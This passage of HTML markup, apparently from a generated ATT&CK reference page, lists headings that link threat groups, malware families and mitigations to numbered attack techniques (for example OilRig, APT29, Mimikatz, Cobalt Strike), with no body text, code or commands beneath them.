<h3 id="_oilrig_g0049_uses_valid_accounts_t1078"><a class="anchor" href="#_oilrig_g0049_uses_valid_accounts_t1078"></a><a class="link" href="#_oilrig_g0049_uses_valid_accounts_t1078">OilRig (G0049) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038_uses_windows_management_instrumentation_t1047"><a class="anchor" href="#_stealth_falcon_g0038_uses_windows_management_instrumentation_t1047"></a><a class="link" href="#_stealth_falcon_g0038_uses_windows_management_instrumentation_t1047">Stealth Falcon (G0038) uses Windows Management Instrumentation (T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_net_crawler_s0056_uses_service_execution_t1035"><a class="anchor" href="#_net_crawler_s0056_uses_service_execution_t1035"></a><a class="link" href="#_net_crawler_s0056_uses_service_execution_t1035">Net Crawler (S0056) uses Service Execution (T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_hammertoss_s0037_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_hammertoss_s0037_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_hammertoss_s0037_uses_custom_cryptographic_protocol_t1024">HAMMERTOSS (S0037) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_trojan_karagany_s0094_uses_process_discovery_t1057"><a class="anchor" href="#_trojan_karagany_s0094_uses_process_discovery_t1057"></a><a class="link" href="#_trojan_karagany_s0094_uses_process_discovery_t1057">Trojan.Karagany (S0094) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_disabling_security_tools_t1089"><a class="anchor" href="#_lazarus_group_g0032_uses_disabling_security_tools_t1089"></a><a class="link" href="#_lazarus_group_g0032_uses_disabling_security_tools_t1089">Lazarus Group (G0032) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_data_encrypted_t1022"><a class="anchor" href="#_ke3chang_g0004_uses_data_encrypted_t1022"></a><a class="link" href="#_ke3chang_g0004_uses_data_encrypted_t1022">Ke3chang (G0004) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_tinyzbot_s0004_uses_disabling_security_tools_t1089"><a class="anchor" href="#_tinyzbot_s0004_uses_disabling_security_tools_t1089"></a><a class="link" href="#_tinyzbot_s0004_uses_disabling_security_tools_t1089">TinyZBot (S0004) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_scripting_t1064"><a class="anchor" href="#_apt1_g0006_uses_scripting_t1064"></a><a class="link" href="#_apt1_g0006_uses_scripting_t1064">APT1 (G0006) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_elmer_s0064_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_elmer_s0064_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_elmer_s0064_uses_standard_application_layer_protocol_t1071">ELMER (S0064) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_re_opened_applications_mitigation_t1164_mitigates_re_opened_applications_t1164"><a class="anchor" href="#_re_opened_applications_mitigation_t1164_mitigates_re_opened_applications_t1164"></a><a class="link" href="#_re_opened_applications_mitigation_t1164_mitigates_re_opened_applications_t1164">Re-opened Applications Mitigation (T1164) mitigates Re-opened Applications (T1164)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_permission_groups_discovery_t1069"><a class="anchor" href="#_admin_338_g0018_uses_permission_groups_discovery_t1069"></a><a class="link" href="#_admin_338_g0018_uses_permission_groups_discovery_t1069">admin@338 (G0018) uses Permission Groups Discovery (T1069)</a></h3>
</div>
<div class="sect2">
<h3 id="_nidiran_s0118_uses_masquerading_t1036"><a class="anchor" href="#_nidiran_s0118_uses_masquerading_t1036"></a><a class="link" href="#_nidiran_s0118_uses_masquerading_t1036">Nidiran (S0118) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_bypass_user_account_control_t1088"><a class="anchor" href="#_apt29_g0016_uses_bypass_user_account_control_t1088"></a><a class="link" href="#_apt29_g0016_uses_bypass_user_account_control_t1088">APT29 (G0016) uses Bypass User Account Control (T1088)</a></h3>
</div>
<div class="sect2">
<h3 id="_cozycar_s0046_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_cozycar_s0046_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_cozycar_s0046_uses_obfuscated_files_or_information_t1027">CozyCar (S0046) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_exfiltration_over_alternative_protocol_t1048"><a class="anchor" href="#_oilrig_g0049_uses_exfiltration_over_alternative_protocol_t1048"></a><a class="link" href="#_oilrig_g0049_uses_exfiltration_over_alternative_protocol_t1048">OilRig (G0049) uses Exfiltration Over Alternative Protocol (T1048)</a></h3>
</div>
<div class="sect2">
<h3 id="_code_signing_mitigation_t1116_mitigates_code_signing_t1116"><a class="anchor" href="#_code_signing_mitigation_t1116_mitigates_code_signing_t1116"></a><a class="link" href="#_code_signing_mitigation_t1116_mitigates_code_signing_t1116">Code Signing Mitigation (T1116) mitigates Code Signing (T1116)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_data_compressed_t1002"><a class="anchor" href="#_prikormka_s0113_uses_data_compressed_t1002"></a><a class="link" href="#_prikormka_s0113_uses_data_compressed_t1002">Prikormka (S0113) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_apt28_g0007_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_apt28_g0007_uses_standard_application_layer_protocol_t1071">APT28 (G0007) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_peripheral_device_discovery_t1120"><a class="anchor" href="#_apt28_g0007_uses_peripheral_device_discovery_t1120"></a><a class="link" href="#_apt28_g0007_uses_peripheral_device_discovery_t1120">APT28 (G0007) uses Peripheral Device Discovery (T1120)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_new_service_t1050"><a class="anchor" href="#_lazarus_group_g0032_uses_new_service_t1050"></a><a class="link" href="#_lazarus_group_g0032_uses_new_service_t1050">Lazarus Group (G0032) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_admin_338_g0018_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_admin_338_g0018_uses_file_and_directory_discovery_t1083">admin@338 (G0018) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_system_information_discovery_t1082"><a class="anchor" href="#_moonwind_s0149_uses_system_information_discovery_t1082"></a><a class="link" href="#_moonwind_s0149_uses_system_information_discovery_t1082">MoonWind (S0149) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_dsquery_s0105_uses_permission_groups_discovery_t1069"><a class="anchor" href="#_dsquery_s0105_uses_permission_groups_discovery_t1069"></a><a class="link" href="#_dsquery_s0105_uses_permission_groups_discovery_t1069">dsquery (S0105) uses Permission Groups Discovery (T1069)</a></h3>
</div>
<div class="sect2">
<h3 id="_path_interception_mitigation_t1034_mitigates_path_interception_t1034"><a class="anchor" href="#_path_interception_mitigation_t1034_mitigates_path_interception_t1034"></a><a class="link" href="#_path_interception_mitigation_t1034_mitigates_path_interception_t1034">Path Interception Mitigation (T1034) mitigates Path Interception (T1034)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_data_staged_t1074"><a class="anchor" href="#_prikormka_s0113_uses_data_staged_t1074"></a><a class="link" href="#_prikormka_s0113_uses_data_staged_t1074">Prikormka (S0113) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_poshspy_s0150"><a class="anchor" href="#_apt29_g0016_uses_poshspy_s0150"></a><a class="link" href="#_apt29_g0016_uses_poshspy_s0150">APT29 (G0016) uses POSHSPY (S0150)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_file_deletion_t1107"><a class="anchor" href="#_bronze_butler_g0060_uses_file_deletion_t1107"></a><a class="link" href="#_bronze_butler_g0060_uses_file_deletion_t1107">BRONZE BUTLER (G0060) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_jhuhugit_s0044_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_jhuhugit_s0044_uses_standard_application_layer_protocol_t1071">JHUHUGIT (S0044) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_regin_s0019_uses_network_sniffing_t1040"><a class="anchor" href="#_regin_s0019_uses_network_sniffing_t1040"></a><a class="link" href="#_regin_s0019_uses_network_sniffing_t1040">Regin (S0019) uses Network Sniffing (T1040)</a></h3>
</div>
<div class="sect2">
<h3 id="_backspace_s0031_uses_command_line_interface_t1059"><a class="anchor" href="#_backspace_s0031_uses_command_line_interface_t1059"></a><a class="link" href="#_backspace_s0031_uses_command_line_interface_t1059">BACKSPACE (S0031) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_helminth_s0170_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_helminth_s0170_uses_standard_application_layer_protocol_t1071">Helminth (S0170) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_plugx_s0013"><a class="anchor" href="#_threat_group_3390_g0027_uses_plugx_s0013"></a><a class="link" href="#_threat_group_3390_g0027_uses_plugx_s0013">Threat Group-3390 (G0027) uses PlugX (S0013)</a></h3>
</div>
<div class="sect2">
<h3 id="_kasidet_s0088_uses_security_software_discovery_t1063"><a class="anchor" href="#_kasidet_s0088_uses_security_software_discovery_t1063"></a><a class="link" href="#_kasidet_s0088_uses_security_software_discovery_t1063">Kasidet (S0088) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_mimikatz_s0002_uses_pass_the_hash_t1075"><a class="anchor" href="#_mimikatz_s0002_uses_pass_the_hash_t1075"></a><a class="link" href="#_mimikatz_s0002_uses_pass_the_hash_t1075">Mimikatz (S0002) uses Pass the Hash (T1075)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_powershell_t1086"><a class="anchor" href="#_dragonfly_g0035_uses_powershell_t1086"></a><a class="link" href="#_dragonfly_g0035_uses_powershell_t1086">Dragonfly (G0035) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_janicab_s0163_uses_code_signing_t1116"><a class="anchor" href="#_janicab_s0163_uses_code_signing_t1116"></a><a class="link" href="#_janicab_s0163_uses_code_signing_t1116">Janicab (S0163) uses Code Signing (T1116)</a></h3>
</div>
<div class="sect2">
<h3 id="_lc_load_dylib_addition_mitigation_t1161_mitigates_lc_load_dylib_addition_t1161"><a class="anchor" href="#_lc_load_dylib_addition_mitigation_t1161_mitigates_lc_load_dylib_addition_t1161"></a><a class="link" href="#_lc_load_dylib_addition_mitigation_t1161_mitigates_lc_load_dylib_addition_t1161">LC_LOAD_DYLIB Addition Mitigation (T1161) mitigates LC_LOAD_DYLIB Addition (T1161)</a></h3>
</div>
<div class="sect2">
<h3 id="_data_obfuscation_mitigation_t1001_mitigates_data_obfuscation_t1001"><a class="anchor" href="#_data_obfuscation_mitigation_t1001_mitigates_data_obfuscation_t1001"></a><a class="link" href="#_data_obfuscation_mitigation_t1001_mitigates_data_obfuscation_t1001">Data Obfuscation Mitigation (T1001) mitigates Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_regsvcs_regasm_mitigation_t1121_mitigates_regsvcs_regasm_t1121"><a class="anchor" href="#_regsvcs_regasm_mitigation_t1121_mitigates_regsvcs_regasm_t1121"></a><a class="link" href="#_regsvcs_regasm_mitigation_t1121_mitigates_regsvcs_regasm_t1121">Regsvcs/Regasm Mitigation (T1121) mitigates Regsvcs/Regasm (T1121)</a></h3>
</div>
<div class="sect2">
<h3 id="_sslmm_s0058_uses_system_information_discovery_t1082"><a class="anchor" href="#_sslmm_s0058_uses_system_information_discovery_t1082"></a><a class="link" href="#_sslmm_s0058_uses_system_information_discovery_t1082">SslMM (S0058) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_gazer_s0168_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_gazer_s0168_uses_obfuscated_files_or_information_t1027">Gazer (S0168) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_wingbird_s0176_uses_service_execution_t1035"><a class="anchor" href="#_wingbird_s0176_uses_service_execution_t1035"></a><a class="link" href="#_wingbird_s0176_uses_service_execution_t1035">Wingbird (S0176) uses Service Execution (T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_osinfo_s0165_uses_permission_groups_discovery_t1069"><a class="anchor" href="#_osinfo_s0165_uses_permission_groups_discovery_t1069"></a><a class="link" href="#_osinfo_s0165_uses_permission_groups_discovery_t1069">OSInfo (S0165) uses Permission Groups Discovery (T1069)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_uncommonly_used_port_t1065"><a class="anchor" href="#_lazarus_group_g0032_uses_uncommonly_used_port_t1065"></a><a class="link" href="#_lazarus_group_g0032_uses_uncommonly_used_port_t1065">Lazarus Group (G0032) uses Uncommonly Used Port (T1065)</a></h3>
</div>
<div class="sect2">
<h3 id="_t9000_s0098_uses_peripheral_device_discovery_t1120"><a class="anchor" href="#_t9000_s0098_uses_peripheral_device_discovery_t1120"></a><a class="link" href="#_t9000_s0098_uses_peripheral_device_discovery_t1120">T9000 (S0098) uses Peripheral Device Discovery (T1120)</a></h3>
</div>
<div class="sect2">
<h3 id="_downpaper_s0186_uses_powershell_t1086"><a class="anchor" href="#_downpaper_s0186_uses_powershell_t1086"></a><a class="link" href="#_downpaper_s0186_uses_powershell_t1086">DownPaper (S0186) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_volgmer_s0180_uses_system_service_discovery_t1007"><a class="anchor" href="#_volgmer_s0180_uses_system_service_discovery_t1007"></a><a class="link" href="#_volgmer_s0180_uses_system_service_discovery_t1007">Volgmer (S0180) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_naikon_g0019_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_naikon_g0019_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_naikon_g0019_uses_system_network_configuration_discovery_t1016">Naikon (G0019) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_exploitation_of_vulnerability_mitigation_t1068_mitigates_exploitation_of_vulnerability_t1068"><a class="anchor" href="#_exploitation_of_vulnerability_mitigation_t1068_mitigates_exploitation_of_vulnerability_t1068"></a><a class="link" href="#_exploitation_of_vulnerability_mitigation_t1068_mitigates_exploitation_of_vulnerability_t1068">Exploitation of Vulnerability Mitigation (T1068) mitigates Exploitation of Vulnerability (T1068)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_pass_the_hash_t1075"><a class="anchor" href="#_apt1_g0006_uses_pass_the_hash_t1075"></a><a class="link" href="#_apt1_g0006_uses_pass_the_hash_t1075">APT1 (G0006) uses Pass the Hash (T1075)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_remote_system_discovery_t1018"><a class="anchor" href="#_cobalt_strike_s0154_uses_remote_system_discovery_t1018"></a><a class="link" href="#_cobalt_strike_s0154_uses_remote_system_discovery_t1018">Cobalt Strike (S0154) uses Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_windows_management_instrumentation_t1047"><a class="anchor" href="#_powruner_s0184_uses_windows_management_instrumentation_t1047"></a><a class="link" href="#_powruner_s0184_uses_windows_management_instrumentation_t1047">POWRUNER (S0184) uses Windows Management Instrumentation (T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_command_and_control_channel_mitigation_t1041_mitigates_exfiltration_over_command_and_control_channel_t1041"><a class="anchor" href="#_exfiltration_over_command_and_control_channel_mitigation_t1041_mitigates_exfiltration_over_command_and_control_channel_t1041"></a><a class="link" href="#_exfiltration_over_command_and_control_channel_mitigation_t1041_mitigates_exfiltration_over_command_and_control_channel_t1041">Exfiltration Over Command and Control Channel Mitigation (T1041) mitigates Exfiltration Over Command and Control Channel (T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_scheduled_transfer_t1029"><a class="anchor" href="#_advstoreshell_s0045_uses_scheduled_transfer_t1029"></a><a class="link" href="#_advstoreshell_s0045_uses_scheduled_transfer_t1029">ADVSTORESHELL (S0045) uses Scheduled Transfer (T1029)</a></h3>
</div>
<div class="sect2">
<h3 id="_spaceship_s0035_uses_shortcut_modification_t1023"><a class="anchor" href="#_spaceship_s0035_uses_shortcut_modification_t1023"></a><a class="link" href="#_spaceship_s0035_uses_shortcut_modification_t1023">SPACESHIP (S0035) uses Shortcut Modification (T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_scripting_t1064"><a class="anchor" href="#_moonwind_s0149_uses_scripting_t1064"></a><a class="link" href="#_moonwind_s0149_uses_scripting_t1064">MoonWind (S0149) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_sowbug_g0054_uses_command_line_interface_t1059"><a class="anchor" href="#_sowbug_g0054_uses_command_line_interface_t1059"></a><a class="link" href="#_sowbug_g0054_uses_command_line_interface_t1059">Sowbug (G0054) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_onionduke_s0052_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_onionduke_s0052_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_onionduke_s0052_uses_standard_application_layer_protocol_t1071">OnionDuke (S0052) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_data_encrypted_t1022"><a class="anchor" href="#_prikormka_s0113_uses_data_encrypted_t1022"></a><a class="link" href="#_prikormka_s0113_uses_data_encrypted_t1022">Prikormka (S0113) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_remote_file_copy_t1105"><a class="anchor" href="#_apt34_g0057_uses_remote_file_copy_t1105"></a><a class="link" href="#_apt34_g0057_uses_remote_file_copy_t1105">APT34 (G0057) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_data_staged_t1074"><a class="anchor" href="#_advstoreshell_s0045_uses_data_staged_t1074"></a><a class="link" href="#_advstoreshell_s0045_uses_data_staged_t1074">ADVSTORESHELL (S0045) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_pisloader_s0124_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_pisloader_s0124_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_pisloader_s0124_uses_standard_application_layer_protocol_t1071">Pisloader (S0124) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_cozycar_s0046_uses_command_line_interface_t1059"><a class="anchor" href="#_cozycar_s0046_uses_command_line_interface_t1059"></a><a class="link" href="#_cozycar_s0046_uses_command_line_interface_t1059">CozyCar (S0046) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_agent_btz_s0092_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_agent_btz_s0092_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_agent_btz_s0092_uses_system_network_configuration_discovery_t1016">Agent.btz (S0092) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_command_line_interface_t1059"><a class="anchor" href="#_magic_hound_g0059_uses_command_line_interface_t1059"></a><a class="link" href="#_magic_hound_g0059_uses_command_line_interface_t1059">Magic Hound (G0059) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_snugride_s0159_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_snugride_s0159_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_snugride_s0159_uses_registry_run_keys_start_folder_t1060">SNUGRIDE (S0159) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_threat_group_3390_g0027_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_threat_group_3390_g0027_uses_system_network_connections_discovery_t1049">Threat Group-3390 (G0027) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt18_g0026_uses_pisloader_s0124"><a class="anchor" href="#_apt18_g0026_uses_pisloader_s0124"></a><a class="link" href="#_apt18_g0026_uses_pisloader_s0124">APT18 (G0026) uses Pisloader (S0124)</a></h3>
</div>
<div class="sect2">
<h3 id="_komprogo_s0156_uses_system_information_discovery_t1082"><a class="anchor" href="#_komprogo_s0156_uses_system_information_discovery_t1082"></a><a class="link" href="#_komprogo_s0156_uses_system_information_discovery_t1082">KOMPROGO (S0156) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_pisloader_s0124_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_pisloader_s0124_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_pisloader_s0124_uses_obfuscated_files_or_information_t1027">Pisloader (S0124) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_flame_s0143_uses_security_software_discovery_t1063"><a class="anchor" href="#_flame_s0143_uses_security_software_discovery_t1063"></a><a class="link" href="#_flame_s0143_uses_security_software_discovery_t1063">Flame (S0143) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_usbstealer_s0136_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_usbstealer_s0136_uses_obfuscated_files_or_information_t1027">USBStealer (S0136) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_carbanak_g0008_uses_rundll32_t1085"><a class="anchor" href="#_carbanak_g0008_uses_rundll32_t1085"></a><a class="link" href="#_carbanak_g0008_uses_rundll32_t1085">Carbanak (G0008) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_chopstick_s0023_uses_input_capture_t1056"><a class="anchor" href="#_chopstick_s0023_uses_input_capture_t1056"></a><a class="link" href="#_chopstick_s0023_uses_input_capture_t1056">CHOPSTICK (S0023) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_input_capture_t1056"><a class="anchor" href="#_apt3_g0022_uses_input_capture_t1056"></a><a class="link" href="#_apt3_g0022_uses_input_capture_t1056">APT3 (G0022) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_code_signing_t1116"><a class="anchor" href="#_gazer_s0168_uses_code_signing_t1116"></a><a class="link" href="#_gazer_s0168_uses_code_signing_t1116">Gazer (S0168) uses Code Signing (T1116)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_query_registry_t1012"><a class="anchor" href="#_oilrig_g0049_uses_query_registry_t1012"></a><a class="link" href="#_oilrig_g0049_uses_query_registry_t1012">OilRig (G0049) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_bypass_user_account_control_mitigation_t1088_mitigates_bypass_user_account_control_t1088"><a class="anchor" href="#_bypass_user_account_control_mitigation_t1088_mitigates_bypass_user_account_control_t1088"></a><a class="link" href="#_bypass_user_account_control_mitigation_t1088_mitigates_bypass_user_account_control_t1088">Bypass User Account Control Mitigation (T1088) mitigates Bypass User Account Control (T1088)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_apt28_g0007_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_apt28_g0007_uses_system_owner_user_discovery_t1033">APT28 (G0007) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_connection_proxy_t1090"><a class="anchor" href="#_cobalt_strike_s0154_uses_connection_proxy_t1090"></a><a class="link" href="#_cobalt_strike_s0154_uses_connection_proxy_t1090">Cobalt Strike (S0154) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_moafee_g0002_uses_binary_padding_t1009"><a class="anchor" href="#_moafee_g0002_uses_binary_padding_t1009"></a><a class="link" href="#_moafee_g0002_uses_binary_padding_t1009">Moafee (G0002) uses Binary Padding (T1009)</a></h3>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038_uses_query_registry_t1012"><a class="anchor" href="#_stealth_falcon_g0038_uses_query_registry_t1012"></a><a class="link" href="#_stealth_falcon_g0038_uses_query_registry_t1012">Stealth Falcon (G0038) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_sys10_s0060_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_sys10_s0060_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_sys10_s0060_uses_custom_cryptographic_protocol_t1024">Sys10 (S0060) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_redundant_access_t1108"><a class="anchor" href="#_apt3_g0022_uses_redundant_access_t1108"></a><a class="link" href="#_apt3_g0022_uses_redundant_access_t1108">APT3 (G0022) uses Redundant Access (T1108)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin10_g0051_uses_remote_file_copy_t1105"><a class="anchor" href="#_fin10_g0051_uses_remote_file_copy_t1105"></a><a class="link" href="#_fin10_g0051_uses_remote_file_copy_t1105">FIN10 (G0051) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_spaceship_s0035_uses_exfiltration_over_physical_medium_t1052"><a class="anchor" href="#_spaceship_s0035_uses_exfiltration_over_physical_medium_t1052"></a><a class="link" href="#_spaceship_s0035_uses_exfiltration_over_physical_medium_t1052">SPACESHIP (S0035) uses Exfiltration Over Physical Medium (T1052)</a></h3>
</div>
<div class="sect2">
<h3 id="_remote_file_copy_mitigation_t1105_mitigates_remote_file_copy_t1105"><a class="anchor" href="#_remote_file_copy_mitigation_t1105_mitigates_remote_file_copy_t1105"></a><a class="link" href="#_remote_file_copy_mitigation_t1105_mitigates_remote_file_copy_t1105">Remote File Copy Mitigation (T1105) mitigates Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_indicator_removal_from_tools_t1066"><a class="anchor" href="#_oilrig_g0049_uses_indicator_removal_from_tools_t1066"></a><a class="link" href="#_oilrig_g0049_uses_indicator_removal_from_tools_t1066">OilRig (G0049) uses Indicator Removal from Tools (T1066)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_commonly_used_port_t1043"><a class="anchor" href="#_duqu_s0038_uses_commonly_used_port_t1043"></a><a class="link" href="#_duqu_s0038_uses_commonly_used_port_t1043">Duqu (S0038) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_multi_hop_proxy_t1188"><a class="anchor" href="#_apt29_g0016_uses_multi_hop_proxy_t1188"></a><a class="link" href="#_apt29_g0016_uses_multi_hop_proxy_t1188">APT29 (G0016) uses Multi-hop Proxy (T1188)</a></h3>
</div>
<div class="sect2">
<h3 id="_lotus_blossom_g0030_uses_emissary_s0082"><a class="anchor" href="#_lotus_blossom_g0030_uses_emissary_s0082"></a><a class="link" href="#_lotus_blossom_g0030_uses_emissary_s0082">Lotus Blossom (G0030) uses Emissary (S0082)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_deployment_software_mitigation_t1017_mitigates_application_deployment_software_t1017"><a class="anchor" href="#_application_deployment_software_mitigation_t1017_mitigates_application_deployment_software_t1017"></a><a class="link" href="#_application_deployment_software_mitigation_t1017_mitigates_application_deployment_software_t1017">Application Deployment Software Mitigation (T1017) mitigates Application Deployment Software (T1017)</a></h3>
</div>
<div class="sect2">
<h3 id="_tinyzbot_s0004_uses_shortcut_modification_t1023"><a class="anchor" href="#_tinyzbot_s0004_uses_shortcut_modification_t1023"></a><a class="link" href="#_tinyzbot_s0004_uses_shortcut_modification_t1023">TinyZBot (S0004) uses Shortcut Modification (T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_backdoor_oldrea_s0093_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_backdoor_oldrea_s0093_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_backdoor_oldrea_s0093_uses_registry_run_keys_start_folder_t1060">Backdoor.Oldrea (S0093) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
